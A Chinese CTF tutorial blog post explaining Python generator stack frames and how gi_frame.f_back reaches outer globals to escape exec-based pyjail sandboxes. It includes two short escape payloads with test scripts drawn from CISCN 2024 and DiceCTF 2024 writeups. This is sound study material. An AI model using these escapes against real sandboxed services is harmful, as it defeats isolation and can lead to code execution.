<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>

<span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Generator started, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">1</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After first yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">2</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After second yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">3</span>

<span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>

<span class="c1"># 第一次调用 next()，启动生成器
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
# 第二次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
# 第三次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span>
<span class="c1"># Generator started, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 4, code my_generator&gt;
# 1
# After first yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 6, code my_generator&gt;
# 2
# After second yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 8, code my_generator&gt;
# 3
</span></pre></td></tr></tbody></table></code></div></div>
<p>每次调用 next() 时，生成器会从上次暂停的位置继续执行，并且它的栈帧保持不变。这表明，在整个生命周期中，生成器的栈帧一直存在，并且保存着它的状态。</p>

<p>我们可以使用 dir 函数来查看生成器的内容</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="n">g</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">])</span>
<span class="nf">dir</span><span class="p">(</span><span class="n">g</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__del__',
#  '__delattr__',
#  ... ,
#  'close',
#  'gi_code',
#  'gi_frame',
#  'gi_running',
#  'gi_suspended',
#  'gi_yieldfrom',
#  'send',
#  'throw']
</span><span class="n">g</span><span class="p">.</span><span class="n">gi_frame</span>  <span class="c1"># &lt;frame at 0x102bd4880, file '/code.py', line 1, code &lt;genexpr&gt;&gt;
</span></pre></td></tr></tbody></table></code></div></div>
<p>生成器对象自身也存在一些独有的属性，以 gi_开头:</p>
<ul>
  <li>gi_frame: gi_frame 就是生成器的栈帧，生成器每次执行，栈帧的地址保持不变。</li>
</ul>

<h3 id="生成器栈帧逃逸-payload"><span class="me-2">生成器栈帧逃逸 payload</span><a href="#生成器栈帧逃逸-payload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>下面是博客 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的一段抽象逻辑：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;&lt;用户提供的 Python 代码&gt;&gt;</span><span class="sh">"""</span>
<span class="p">...</span> <span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">)</span>
<span class="p">...</span> <span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<p>用户的代码被丢进exec中执行。经过严格的过滤后，import、魔术方法、builtins 等沙箱逃逸的常用思路都会被堵死。这时候想要逃逸到 exec 环境之外拿到flag，甚至是 RCE，就需要通过栈帧回溯来实现。</p>

<h4 id="payload1"><span class="me-2">payload1</span><a href="#payload1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>文章 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的 payload 如下：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="p">[</span><span class="o">*</span><span class="n">q</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># g 现在是 exec 之外的栈帧的 globals 了
# g 是一个 dict，其中包含 flag 变量
</span></pre></td></tr></tbody></table></code></div></div>
<p>要理解上面的表达式，需要明白：</p>
<ol>
  <li>==生成器在初始化时并不会立即执行==。q 初始化之后并不会立即执行，而是到 [*q] 时才执行。因此乍一眼看有语法问题，q 并没有定义啊？但是当其执行时，q 已经是一个生成器对象了。</li>
  <li>f_back 属性用于访问调用栈中的前一个栈帧。</li>
</ol>

<p>因此：</p>
<ul>
  <li>q.gi_frame 是生成器对象 q 的当前栈帧。</li>
  <li>q.gi_frame.f_back 得到的是 exec 函数的栈帧，</li>
  <li>q.gi_frame.f_back.f_back 得到的就是全局栈帧了。</li>
  <li>q.gi_frame.f_back.f_back.f_globals 得到的就是 globals() 函数的内容。</li>
</ul>

<p>builtins 和 locals 也可以同理拿到。</p>

<p>作者提到为什么非得把 q.gi_frame 写在生成器里面？为什么不能写成下面这样：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span>
</pre></td></tr></tbody></table></code></div></div>

<p>原因在于只有在生成器运行过程中，q.gi_frame.f_back 才不为 None（CPython 中定义的逻辑）。即使 q 已经是一个生成器，但是由于并没有进行解包操作，生成器并没有运行，所以 q.gi_frame.f_back 始终为 None，如果没有解包的话，即使像上面那样写，结果也是 None。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span>
<span class="c1"># None
</span></pre></td></tr></tbody></table></code></div></div>

<p>测试脚本：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">q = (q.gi_frame.f_back.f_back.f_globals for _ in [1]);g = [*q][0];print(g)</span><span class="sh">"""</span>
<span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h4 id="payload2"><span class="me-2">payload2</span><a href="#payload2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p><a href="https://maplebacon.org/2024/02/dicectf2024-irs/">[DiceCTF 2024] IRS</a> 这篇博客也给出了一个生成器栈帧的 payload：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">f</span><span class="p">():</span>
    <span class="k">global</span> <span class="n">x</span><span class="p">,</span> <span class="n">frame</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span>
    <span class="k">yield</span>
<span class="n">x</span> <span class="o">=</span> <span class="nf">f</span><span class="p">()</span>
<span class="n">x</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="bp">None</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">frame</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>
<p>如何理解这段代码：</p>
<ol>
  <li>首先声明了一个生成器 f，
    <ol>
      <li>f 内部声明了全局变量 x 和 frame，意味着会在函数外部对其进行操作。</li>
    </ol>
  </li>
  <li>x = f() 会实例化一个生成器，但由于生成器的延迟加载，此时生成器不会执行。</li>
  <li>x.send(None)：这行代码启动了生成器，并让它执行到第一个 yield 语句。</li>
</ol>

<p>ps: 文章作者这段 payload 与上面那种 payload 的区别再于没有显示定一个生成器，AST 中不会出现 ast.GeneratorExp。</p>

<p>测试代码如下：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">'''</span><span class="s">
def f():
    global x, frame
    frame = x.gi_frame.f_back.f_back
    yield
x = f()
x.send(None)
print(frame.f_globals)
</span><span class="sh">'''</span>

<span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="csicn-2024-mossfern"><span class="me-2">CSICN 2024 mossfern</span><a href="#csicn-2024-mossfern" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h2 id="参考资料"><span class="me-2">参考资料</span><a href="#参考资料" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<ul>
  <li>
    <div class="table-wrapper"><table>
      <tbody>
        <tr>
          <td>[利用生成器栈帧逃逸 Pyjail</td>
          <td>CISCN 2024 mossfern 题解](https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern)</td>
        </tr>
      </tbody>
    </table></div>
  </li>
</ul>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/python/">Python</a>
      </div>
    
    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/pyjail/"
            class="post-tag no-text-decoration"
          >pyjail</a>
        
      </div>
    
    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
      <a href="https://twitter.com/intent/tweet?text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    
      <a href="https://www.facebook.com/sharer/sharer.php?title=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&u=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    
      <a href="https://t.me/share/url?url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F&text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    
    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->

  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        <li class="text-truncate lh-lg">
          <a href="/posts/phpggc-thinkphp-%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/">phpggc thinkphp 利用链分析</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8/">php 反序列化利用</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%A0%BC%E5%BC%8F%E5%9F%BA%E7%A1%80/">php 反序列化格式基础</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87/">php 反序列化绕过</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/">php 反序列化字符逃逸</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->

              <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

            </div>

  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->

<!-- An random integer that bigger than 0 -->

<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->

  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/QWB-2023-writeup/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1702981788"
  data-df="ll"
  
>
  Dec 19, 2023
</time>

              <h4 class="pt-0 my-2">QWB 2023 Writeup</h4>
              <div class="text-muted">
                <p>WEB
happygame
题目提供了一个 gRPC 服务。gRPC 是一个由 Google 初始开发的高性能、开源的远程过程调用（RPC）框架。网上已有不少针对 gRPC 的安全研究：

  【Black Hat Asia 2021系列分享】自动化挖掘 gRPC 网络接口漏洞
  gRPC内存马研究与查杀 - 先知社区

gRPC 框架如下所示：

可见服务端由 Java 编写。

针...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-04-%E7%BB%95%E8%BF%87%E5%A4%9A%E8%A1%8C%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-04 绕过多行限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过多行限制
绕过多行限制的利用手法通常在限制了单行代...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-03-%E7%BB%95%E8%BF%87%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-03 绕过命名空间限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过命名空间限制

部分限制
有些沙箱在构建时使用 e...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->

              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
    <a
      href="/posts/pyjail-bypass-10-%E7%BB%95%E8%BF%87-opcode-%E6%B2%99%E7%AE%B1/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>pyjail bypass-10 绕过 opcode 沙箱</p>
    </a>
  
    <a
      href="/posts/TPCTF-2025-web-writeup/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>TPCTF 2025 Web Writeup</p>
    </a>
  
</nav>

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

      <a href="https://twitter.com/DummyKitty">DummyKitty</a>.
    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    <!-- Embedded scripts -->

      <!-- The comments switcher -->

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->

<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>
/style><<!doctype html>

<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="light">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
